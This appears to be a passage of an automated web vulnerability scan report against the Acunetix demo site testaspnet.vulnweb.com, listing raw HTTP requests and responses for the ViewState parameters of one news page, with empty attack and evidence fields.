href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 465 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 Content-Length: 3765 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,765 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8%2FZtiayAG6OnQCA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLyytPMBgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I%2BC%2BTrBHqvCj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxh